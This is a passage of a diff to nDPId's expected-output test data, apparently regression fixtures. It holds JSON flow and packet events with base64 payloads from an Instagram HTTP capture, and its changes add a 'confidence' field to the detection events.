yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprDfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7440000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -125,18 +127,18 @@
 02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00814{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00805{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"}
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="}
 02390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02386{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6Yh\/BrGK2ISAtFCkh5uw9+EN15dd79TckDZ5M\/1IXL8vqbu\/hTG\/JfucZfR3dz3L3c+OhdygQW8UzKVOFvvFE3uZQnd322DAH7zC3LRHAXbCjqHBmwf2whhpegjLfm6RfL+z+IzmMokA9e2qfVhZ6xYQdwpjxowXA\/a0hFuEIYBqgg2RBxOTW9B0lNexKZj7L7myCIQt5asMs3OULjIFOSJmLxUIk3Q37w4ymEfVUM4Q7YQrd2Q7D7oXQeE3jsBBmSxiRovqahgnBN4hvIeCZZMLY1uvosfkYR3vNLSiHuKZeam\/RFQJomYqTPcrO3yya\/L8n\/bJvfwlRzHWNuu76VGEBOTSmIQrzPwlvzfa91FS9xmltfjK8v2vivjQ79d9wnDovM7E8heMjng\/L76qTSur9Xu++liqI9lESwcV36\/iMv+UhBAvwlNl9yFOXzTHExcfuKxDjy2WcT\/yjID\/XwdhLUHYsgQ9jzrKZiitJYPrb03G\/4eqDHUUFspftslQp6lFXZbtMgT+PtX+iul7L97VDMHXGdwaI8TzZ6\/jXre8vnY2F+CmIZKNEjnJpMB39UHX\/p7\/3FfZpIUwHcB3IlgFw2RAH5dbcIGzC1nhuJYVIQctqJ04wUFMG9bZhr46HZ73BXAQuUhUW68mxXOEcSUvu6IiD4944qVAoG\/m5vfXCzer8TXXbtxGJy\/lJZWKxmuOzEdM\/69tZAld3d7Oi+E\/\/wSXdP1F9r8RHsvFnMaKa\/Gb3fFq120z5cfUI5ObITs4O5x1e\/k2SP4T55SQ1l\/\/E7jbfd3y\/W+K4YanQb4PNdLvnwtOUEVU10v172Jve733E93FYrd8\/r7COigUu\/j7zMkQoWBxC6yXxRL8fBFpX1\/jifjboOb9QR4q79l+S7kBZXF3dpMduttP55\/mpWYFflzvfd\/Hx+Ie9ijit30tVfYliZvDoVqX8Iibo18xmX2SURsTLcDlv6t9hYNRdUnFiX1r9e4\/4uD+iVcRBUU8hc0fHv5tu\/ghpv97F5dOxeZj2CiEjpYqtM2N6y9Ex9X2v34njvtqIprtcVwGtsEjAY8n2yd95fX6LnY6678J3vfovd9+pLl7ZMl\/\/3mgopvtAOiqdmdl8m1KgVxW1IDqxnD5Yq+7jVsvs"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1436720950910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720950910,"pkt":"ABsv8H60QPMIw47hCABFAAA0TetAAEAGtojAqABnHw1WNONoAFAuGbTPoOL3GoAQH8w2dwAAAQEICgAD\/xATwkKT"}
